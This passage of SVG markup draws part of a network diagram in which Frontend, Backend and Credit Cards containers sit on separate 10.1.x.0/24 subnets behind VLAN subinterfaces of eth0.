stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="23" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="31" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="34" y="42">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="49" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="52" y="42">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="60" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="63" y="42">24</text></g></g><g transform="matrix(1,0,0,1,275,387)"><g transform="translate(0,0)"><g transform="translate(-292,-88.9329528808594) translate(17,-298.0670471191406) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 279 409 L 279 391" stroke-miterlimit="10"/></g></g></g></g><g transform="matrix(1,0,0,1,215,341)"><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="129" height="40" fill-opacity="0"/></g></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="129" height="20" fill-opacity="0"/></g></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="0" width="127" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="2" y="17">Parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="55" y="17">:</text></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="65" y="0" width="63" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="65" y="17">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="102" y="17">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="107" y="17">20</text></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="20" width="129" height="20" fill-opacity="0"/></g></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="20" width="101" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="14" y="37">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="66" y="37">ID</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="84" y="37">:</text></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="95" y="20" width="21" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="95" y="37">20</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,367,409)"><g transform="translate(4,4) scale(1.0034722222222223,1.0042735042735043)"><g><g transform="translate(0,0) scale(1.44,1.17)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8547008547008548)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 107 Q 144 117 134 117 L 10 117 Q 0 117 0 107 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 107 Q 144 117 134 117 L 10 117 Q 0 117 0 107 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,1.17)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8547008547008548)"><path fill="#eb6c6c" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 107 Q 144 117 134 117 L 10 117 Q 0 117 0 107 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 107 Q 144 117 134 117 L 10 117 Q 0 117 0 107 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="matrix(1,0,0,1,435,387)"><g transform="translate(0,0)"><g transform="translate(-622,-98.9329528808594) translate(187,-288.0670471191406) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 439 409 L 439 391" stroke-miterlimit="10"/></g></g></g></g><g transform="matrix(1,0,0,1,373,501)"><g transform="translate(15,0) matrix(1,0,0,1,0,0) translate(-15,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(15,0) matrix(1,0,0,1,0,0) translate(-15,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(15,0) matrix(1,0,0,1,0,0) translate(-15,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="15" y="0" width="102" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="15" y="17">Credit</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="69" y="17">Cards</text></g></g><g transform="matrix(1,0,0,1,211,502)"><g transform="translate(31,0) matrix(1,0,0,1,0,0) translate(-31,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(31,0) matrix(1,0,0,1,0,0) translate(-31,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(31,0) matrix(1,0,0,1,0,0) translate(-31,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="31" y="0" width="72" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="31" y="17">Backend</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,394.910447761194,438.2696192696193)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,385.95522388059703,428.63480963480964)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,377,419)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="matrix(1,0,0,1,387,424)"><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="44" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="14" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="61" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="65" y="12">s</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="71" y="12">)</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="83" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="27">Eth0</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="29" width="73" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="5" y="42">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="20" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="23" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="31" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="34" y="42">30</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="49" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="52" y="42">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="60" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="63" y="42">24</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,74.91044776119404,438.2696192696193)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,65.95522388059702,428.63480963480964)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,57,419)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="matrix(1,0,0,1,67,424)"><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="44" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="14" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="61" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="65" y="12">s</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="71" y="12">)</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="83" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="27">Eth0</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="29" width="73" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="5" y="42">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="20" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="23" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="31" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="34" y="42">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="49" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="52" y="42">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="60" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="63" y="42">24</text></g></g><g transform="matrix(1,0,0,1,53,502)"><g transform="translate(30,0) matrix(1,0,0,1,0,0) translate(-30,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(30,0) matrix(1,0,0,1,0,0) translate(-30,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(30,0) matrix(1,0,0,1,0,0) translate(-30,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="30" y="0" width="74" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="30" y="17">Frontend</text></g></g><g transform="matrix(1,0,0,1,271.50000000000006,96.41047267550272)"><g 